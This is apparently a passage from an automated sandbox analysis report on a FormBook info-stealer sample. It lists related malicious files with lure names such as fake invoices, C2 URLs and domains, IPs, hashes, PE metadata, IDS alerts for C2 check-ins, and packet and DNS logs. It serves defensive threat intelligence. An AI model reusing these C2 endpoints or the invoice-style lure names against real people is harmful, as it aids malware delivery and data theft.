	Ohki Blower Skid Base Enquiry 052521.exe	Get hash	malicious	Browse	www.locply.com/un8c/?5j9=NGTfkvtaSdon4EkoI3ozpRr9bmxMgy9gsF1pztjoLp+4u8wBsb/6oXmWjnwO4OIYUp5f&vR=Ltxx
	New order 301534.pdf.exe	Get hash	malicious	Browse	www.yamagym.com/sbqi/?ZjR=A9FpVWg2dAPyDanCbkAal5xn8XynSE6PITFa1NeTTcon3r6OOg1WhLKe7RzZoujgxIl9KDseIA==&ndnddT=ot9xbpDpf8H4
	Ciikfddtznhxmtqufdujkifxwmwhrfjkcl_Signed_.exe	Get hash	malicious	Browse	www.f3g.fund/qd8i/?Qp=iKdGhUQd0gzURvlm3Jt41em8p9uaSRabaJyAAib1YADWOisPkV2HIhSGGZPUNHkrRq2K&xPWH_=LVz4vpXpDf7DLZ
	Wire Payment Of $35,276.70.exe	Get hash	malicious	Browse	www.locply.com/un8c/?q48=GbqltxjpVhB0It&Bzu=NGTfkvtaSdon4EkoI3ozpRr9bmxMgy9gsF1pztjoLp+4u8wBsb/6oXmWjn8OreEbN55J1SAp8g==
	4LkSpeVqKR.exe	Get hash	malicious	Browse	www.chalance.design/uoe8/?V2=LhqpTfJ8&rDHpw=fYbYSxt3Qhcb551a7rNTvuoixibj8olf9Mxoep0JAE6bsM5dZYso9WmxDlWOvfueGt5G
	d801e424_by_Libranalysis.docx	Get hash	malicious	Browse	www.playx.finance/qjnt/?BZz=llM0X6&h48x=1Vbp9If7QMpbnqc0ueS3EHoyDdmNKH7SkWmwpG2wK8nHe9QxMxQiDr/Rv9rAbZu592D3MQ==
	z5Wqivscwd.exe	Get hash	malicious	Browse	www.rascontractingllc.com/f0sg/?EzrtFB=4hL05l3xNH1L&9rQPJl=VL61RGYCRIinPGEMi+ZAGnHYp8XZVvRzeWAN7Ibk9LNon96r6atV/Ask5zouKtgOTJp7
	AL-IEDAHINV.No09876543.exe	Get hash	malicious	Browse	www.sandybottomsflipflops.com/uv34/?gjKTUx=6lchmDL0&rnKTobm=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXG9G+2GrVPAT
	24032130395451.pdf .exe	Get hash	malicious	Browse	www.partum.life/uabu/?ojqD-Z=KdrhxNh8&9r4Hc=Z0zf2dbKX6YlEzcI0VbwASPt08RzMP75iVffTsKn6GzwBBbR2IjFiCH6cCoBJQjqXWja
	Ac5RA9R99F.exe	Get hash	malicious	Browse	www.abundancewithmelissaharvey.com/evpn/?CZa4=UnLa0x8cdATkkSAlrLSX44s3EHgIYFf2NLcg8KhuRo/6FK7nrIMQsSkng9ZA6ahsodQ1&CPWhW=C8eHk
	SA-NQAW12n-NC9W03-pdf.exe	Get hash	malicious	Browse	www.switcheo.finance/uwec/?GFQl9jnp=3cOH6CffnF8zA2vO0DHvKlrvSwO+w2vUbH/s+qgAJjYXXQ/ohIL0shsdTQ14Zv3dTuQV&Rl4=YVFTx4yh

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.hazard-protection.com	ZQGMiyaTir.exe	Get hash	malicious	Browse	148.59.128.71
	eHTLcWfhgv.exe	Get hash	malicious	Browse	148.59.128.71
	UOMp9cDcqZ.exe	Get hash	malicious	Browse	148.59.128.71
	qXDtb88hht.exe	Get hash	malicious	Browse	148.59.128.71
	17jLieeOPx.exe	Get hash	malicious	Browse	148.59.128.71
	KWX1rM9GB0.exe	Get hash	malicious	Browse	148.59.128.71
	Contract MAY2021.xlsx	Get hash	malicious	Browse	148.59.128.71
	k7AgZOwF4S.exe	Get hash	malicious	Browse	148.59.128.71
	o52k2obPCG.exe	Get hash	malicious	Browse	148.59.128.71
	uNttFPI36y.exe	Get hash	malicious	Browse	148.59.128.71
	1ucvVfbHnD.exe	Get hash	malicious	Browse	148.59.128.71
	pumYguna1i.exe	Get hash	malicious	Browse	148.59.128.71
	DYANAMIC Inquiry.xlsx	Get hash	malicious	Browse	148.59.128.71
	g0g865fQ2S.exe	Get hash	malicious	Browse	148.59.128.71
	mar2403.xlsx	Get hash	malicious	Browse	148.59.128.71
parkingpage.namecheap.com	INV NO-1820000514 USD 270,294.pdf.exe	Get hash	malicious	Browse	198.54.117.216
	Payment For Invoice 321-1005703.exe	Get hash	malicious	Browse	198.54.117.212
	Medical Equipment Order 2021.PDF.exe	Get hash	malicious	Browse	198.54.117.210
	YfDl.dll	Get hash	malicious	Browse	198.54.117.210
	d9UdQnXQ86ld31G.exe	Get hash	malicious	Browse	198.54.117.212
	k0INCz463k.exe	Get hash	malicious	Browse	198.54.117.210
	PO-829ARTS-PI 2021-7-17.xlsx	Get hash	malicious	Browse	198.54.117.211
	Inv_7623980.exe	Get hash	malicious	Browse	198.54.117.215
	direction.dll	Get hash	malicious	Browse	198.54.117.218
	Purchase Order.exe	Get hash	malicious	Browse	198.54.117.215
	PYY74882220#.exe	Get hash	malicious	Browse	198.54.117.215
	cZj7V8FfFk.exe	Get hash	malicious	Browse	198.54.117.218
	Order Signed PEARLTECH contract and PO.exe	Get hash	malicious	Browse	198.54.117.210
	Payment_invoice.exe	Get hash	malicious	Browse	198.54.117.212
	INVOICE.exe	Get hash	malicious	Browse	198.54.117.211
	Order.exe	Get hash	malicious	Browse	198.54.117.215
	SMdWrQW0nH.exe	Get hash	malicious	Browse	198.54.117.218
	4326_PDF.exe	Get hash	malicious	Browse	198.54.117.216
	LPY15536W4.exe	Get hash	malicious	Browse	198.54.117.211
	u5xgJUljfI.exe	Get hash	malicious	Browse	198.54.117.210

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	INV NO-1820000514 USD 270,294.pdf.exe	Get hash	malicious	Browse	198.54.117.216
	scan_2021_567812097854317907854.exe	Get hash	malicious	Browse	199.188.201.82
	SGKCM20217566748_Federighi Turkiye Oferta Term#U00e9k .exe	Get hash	malicious	Browse	192.64.119.222
	bYrKwcFL8m.exe	Get hash	malicious	Browse	198.54.122.60
	Our Company Account Details-08-2021.xlsx	Get hash	malicious	Browse	198.54.122.60
	Payment For Invoice 321-1005703.exe	Get hash	malicious	Browse	198.54.117.212
	Medical Equipment Order 2021.PDF.exe	Get hash	malicious	Browse	198.54.117.216
	YfDl.dll	Get hash	malicious	Browse	162.255.119.73
	sstein@cptech.com_94994965Application.HTM	Get hash	malicious	Browse	162.213.253.39
	d9UdQnXQ86ld31G.exe	Get hash	malicious	Browse	198.54.117.212
	Vt03edQseah3iHM.exe	Get hash	malicious	Browse	68.65.123.125
	INVOICE & PACKING LIST FOR SEA SHIPMENT.EXE	Get hash	malicious	Browse	199.188.200.123
	MIN56KgzBN.exe	Get hash	malicious	Browse	63.250.33.126
	xA8Yyl9vEB.exe	Get hash	malicious	Browse	198.54.122.60
	xVg4so8mq9.exe	Get hash	malicious	Browse	198.54.122.60
	REVISED PO 26663S.doc	Get hash	malicious	Browse	198.54.122.60
	order PT Macropharma.pdf.doc	Get hash	malicious	Browse	198.54.122.60
	Purchase Order No. PHS-01521-22..doc	Get hash	malicious	Browse	198.54.122.60
	Blackcatjsc inquiry.doc	Get hash	malicious	Browse	198.54.122.60
	1M3InhCdS7.exe	Get hash	malicious	Browse	198.54.122.60

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\V5cfxBHd71.exe.log Download File
Process:	C:\Users\user\Desktop\V5cfxBHd71.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.395625597721572
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	V5cfxBHd71.exe
File size:	793600
MD5:	182170393a1acd19744575f00562384f
SHA1:	e2b2d6405b359d78ba965b54e9cc6b38e223fd97
SHA256:	71ec0c91aeec5071da283d23bceb39800e9ad6c133bb6aef99d1302f47a4ada3
SHA512:	92e122d0edf30c0ad285b79e344795b90682a6ad4d8a9b6fd6003d4c2bfcaed8b2ce599caed8b55e1fdb6a2474f22236661a1780063521eea4d084afeb522f3a
SSDEEP:	12288:Eo4rGVHDwXyWU6/RRtaD8xI5eFYECvT+5wMpTxcujI80v42iN:EobBitaII5eFYkm6TxcujZx1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M................P..............1... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4c31f2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xF0944DD6 [Mon Nov 25 20:51:34 2097 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc31a0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x5f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc3184	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc11f8	0xc1200	False	0.778078226133	data	7.40347651298	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xc4000	0x5f4	0x600	False	0.434244791667	data	4.20291982241	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc6000	0xc	0x200	False	0.044921875	data	0.0980041756627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xc4090	0x364	data
RT_MANIFEST	0xc4404	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2020
Assembly Version	1.0.0.0
InternalName	IdentityNotMappedExcepti.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	Modul VB 3
ProductVersion	1.0.0.0
FileDescription	Modul VB 3
OriginalFilename	IdentityNotMappedExcepti.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/03/21-18:26:15.542488	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49726	80	192.168.2.5	198.54.126.105
08/03/21-18:26:15.542488	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49726	80	192.168.2.5	198.54.126.105
08/03/21-18:26:15.542488	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49726	80	192.168.2.5	198.54.126.105
08/03/21-18:26:20.797106	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49729	80	192.168.2.5	34.102.136.180
08/03/21-18:26:20.797106	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49729	80	192.168.2.5	34.102.136.180
08/03/21-18:26:20.797106	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49729	80	192.168.2.5	34.102.136.180
08/03/21-18:26:20.911098	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49729	34.102.136.180	192.168.2.5
08/03/21-18:26:53.982804	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49733	80	192.168.2.5	223.29.234.230
08/03/21-18:26:53.982804	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49733	80	192.168.2.5	223.29.234.230
08/03/21-18:26:53.982804	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49733	80	192.168.2.5	223.29.234.230

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 18:26:15.374298096 CEST	49726	80	192.168.2.5	198.54.126.105
Aug 3, 2021 18:26:15.542203903 CEST	80	49726	198.54.126.105	192.168.2.5
Aug 3, 2021 18:26:15.542391062 CEST	49726	80	192.168.2.5	198.54.126.105
Aug 3, 2021 18:26:15.542488098 CEST	49726	80	192.168.2.5	198.54.126.105
Aug 3, 2021 18:26:15.712918043 CEST	80	49726	198.54.126.105	192.168.2.5
Aug 3, 2021 18:26:15.712949991 CEST	80	49726	198.54.126.105	192.168.2.5
Aug 3, 2021 18:26:15.713170052 CEST	49726	80	192.168.2.5	198.54.126.105
Aug 3, 2021 18:26:15.713287115 CEST	49726	80	192.168.2.5	198.54.126.105
Aug 3, 2021 18:26:15.882203102 CEST	80	49726	198.54.126.105	192.168.2.5
Aug 3, 2021 18:26:20.780152082 CEST	49729	80	192.168.2.5	34.102.136.180
Aug 3, 2021 18:26:20.796807051 CEST	80	49729	34.102.136.180	192.168.2.5
Aug 3, 2021 18:26:20.796936989 CEST	49729	80	192.168.2.5	34.102.136.180
Aug 3, 2021 18:26:20.797106028 CEST	49729	80	192.168.2.5	34.102.136.180
Aug 3, 2021 18:26:20.813962936 CEST	80	49729	34.102.136.180	192.168.2.5
Aug 3, 2021 18:26:20.911098003 CEST	80	49729	34.102.136.180	192.168.2.5
Aug 3, 2021 18:26:20.911204100 CEST	80	49729	34.102.136.180	192.168.2.5
Aug 3, 2021 18:26:20.911437035 CEST	49729	80	192.168.2.5	34.102.136.180
Aug 3, 2021 18:26:20.911519051 CEST	49729	80	192.168.2.5	34.102.136.180
Aug 3, 2021 18:26:20.930290937 CEST	80	49729	34.102.136.180	192.168.2.5
Aug 3, 2021 18:26:37.324582100 CEST	49730	80	192.168.2.5	198.54.117.218
Aug 3, 2021 18:26:37.491797924 CEST	80	49730	198.54.117.218	192.168.2.5
Aug 3, 2021 18:26:37.491883039 CEST	49730	80	192.168.2.5	198.54.117.218
Aug 3, 2021 18:26:37.492023945 CEST	49730	80	192.168.2.5	198.54.117.218
Aug 3, 2021 18:26:37.659487963 CEST	80	49730	198.54.117.218	192.168.2.5
Aug 3, 2021 18:26:37.659518003 CEST	80	49730	198.54.117.218	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 18:24:27.172913074 CEST	65307	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:27.219603062 CEST	53	65307	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:27.575287104 CEST	64344	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:27.607637882 CEST	53	64344	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:28.195153952 CEST	62060	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:28.222557068 CEST	53	62060	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:28.345031977 CEST	61805	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:28.377428055 CEST	53	61805	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:29.660536051 CEST	54795	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:29.686000109 CEST	53	54795	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:30.676867962 CEST	49557	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:30.717699051 CEST	53	49557	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:31.231796026 CEST	61733	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:31.268788099 CEST	53	61733	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:31.594803095 CEST	65447	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:31.622525930 CEST	53	65447	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:32.873420000 CEST	52441	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:32.909331083 CEST	53	52441	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:34.425580978 CEST	62176	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:34.450665951 CEST	53	62176	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:36.074873924 CEST	59596	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:36.099934101 CEST	53	59596	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:36.855380058 CEST	65296	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:36.881489992 CEST	53	65296	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:40.282782078 CEST	63183	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:40.310189962 CEST	53	63183	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:41.129328012 CEST	60151	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:41.159348965 CEST	53	60151	8.8.8.8	192.168.2.5
Aug 3, 2021 18:24:51.946479082 CEST	56969	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:24:51.980468035 CEST	53	56969	8.8.8.8	192.168.2.5
Aug 3, 2021 18:25:03.100332022 CEST	55161	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:25:03.137058020 CEST	53	55161	8.8.8.8	192.168.2.5
Aug 3, 2021 18:25:22.512311935 CEST	54757	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:25:22.547055960 CEST	53	54757	8.8.8.8	192.168.2.5
Aug 3, 2021 18:25:25.473907948 CEST	49992	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:25:25.510607958 CEST	53	49992	8.8.8.8	192.168.2.5
Aug 3, 2021 18:25:39.738980055 CEST	60075	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:25:39.794291019 CEST	53	60075	8.8.8.8	192.168.2.5
Aug 3, 2021 18:25:45.303232908 CEST	55016	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:25:45.337323904 CEST	53	55016	8.8.8.8	192.168.2.5
Aug 3, 2021 18:26:09.839133978 CEST	64345	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:26:10.303777933 CEST	53	64345	8.8.8.8	192.168.2.5
Aug 3, 2021 18:26:15.319434881 CEST	57128	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:26:15.370718956 CEST	53	57128	8.8.8.8	192.168.2.5
Aug 3, 2021 18:26:16.690603018 CEST	54791	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:26:16.737847090 CEST	53	54791	8.8.8.8	192.168.2.5
Aug 3, 2021 18:26:18.794346094 CEST	50463	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:26:18.835032940 CEST	53	50463	8.8.8.8	192.168.2.5
Aug 3, 2021 18:26:20.726124048 CEST	50394	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:26:20.778676987 CEST	53	50394	8.8.8.8	192.168.2.5
Aug 3, 2021 18:26:25.950511932 CEST	58530	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:26:26.333971977 CEST	53	58530	8.8.8.8	192.168.2.5
Aug 3, 2021 18:26:31.351497889 CEST	53813	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:26:31.864424944 CEST	53	53813	8.8.8.8	192.168.2.5
Aug 3, 2021 18:26:37.261212111 CEST	63732	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:26:37.297532082 CEST	53	63732	8.8.8.8	192.168.2.5
Aug 3, 2021 18:26:42.740745068 CEST	57344	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:26:42.924705029 CEST	53	57344	8.8.8.8	192.168.2.5
Aug 3, 2021 18:26:48.287003040 CEST	54450	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:26:48.414810896 CEST	53	54450	8.8.8.8	192.168.2.5
Aug 3, 2021 18:26:53.710860014 CEST	59261	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:26:53.749840975 CEST	53	59261	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 18:26:09.839133978 CEST	192.168.2.5	8.8.8.8	0x4a65	Standard query (0)	www.tpcgzwlpyggm.mobi	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:15.319434881 CEST	192.168.2.5	8.8.8.8	0x3184	Standard query (0)	www.vectoroutlines.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:20.726124048 CEST	192.168.2.5	8.8.8.8	0x5822	Standard query (0)	www.3cheer.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:25.950511932 CEST	192.168.2.5	8.8.8.8	0xa8fc	Standard query (0)	www.m678.xyz	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:31.351497889 CEST	192.168.2.5	8.8.8.8	0x3b41	Standard query (0)	www.kce0728com.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:37.261212111 CEST	192.168.2.5	8.8.8.8	0x746e	Standard query (0)	www.boogerstv.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:42.740745068 CEST	192.168.2.5	8.8.8.8	0x49f2	Standard query (0)	www.leonardocarrillo.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:48.287003040 CEST	192.168.2.5	8.8.8.8	0xb99d	Standard query (0)	www.hazard-protection.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:53.710860014 CEST	192.168.2.5	8.8.8.8	0xfef8	Standard query (0)	www.mercuryaid.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 18:26:10.303777933 CEST	8.8.8.8	192.168.2.5	0x4a65	Name error (3)	www.tpcgzwlpyggm.mobi	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:15.370718956 CEST	8.8.8.8	192.168.2.5	0x3184	No error (0)	www.vectoroutlines.com	vectoroutlines.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:26:15.370718956 CEST	8.8.8.8	192.168.2.5	0x3184	No error (0)	vectoroutlines.com		198.54.126.105	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:20.778676987 CEST	8.8.8.8	192.168.2.5	0x5822	No error (0)	www.3cheer.com	3cheer.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:26:20.778676987 CEST	8.8.8.8	192.168.2.5	0x5822	No error (0)	3cheer.com		34.102.136.180	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:26.333971977 CEST	8.8.8.8	192.168.2.5	0xa8fc	Name error (3)	www.m678.xyz	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:31.864424944 CEST	8.8.8.8	192.168.2.5	0x3b41	Server failure (2)	www.kce0728com.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:37.297532082 CEST	8.8.8.8	192.168.2.5	0x746e	No error (0)	www.boogerstv.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:26:37.297532082 CEST	8.8.8.8	192.168.2.5	0x746e	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:37.297532082 CEST	8.8.8.8	192.168.2.5	0x746e	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:37.297532082 CEST	8.8.8.8	192.168.2.5	0x746e	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:37.297532082 CEST	8.8.8.8	192.168.2.5	0x746e	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:37.297532082 CEST	8.8.8.8	192.168.2.5	0x746e	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:37.297532082 CEST	8.8.8.8	192.168.2.5	0x746e	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
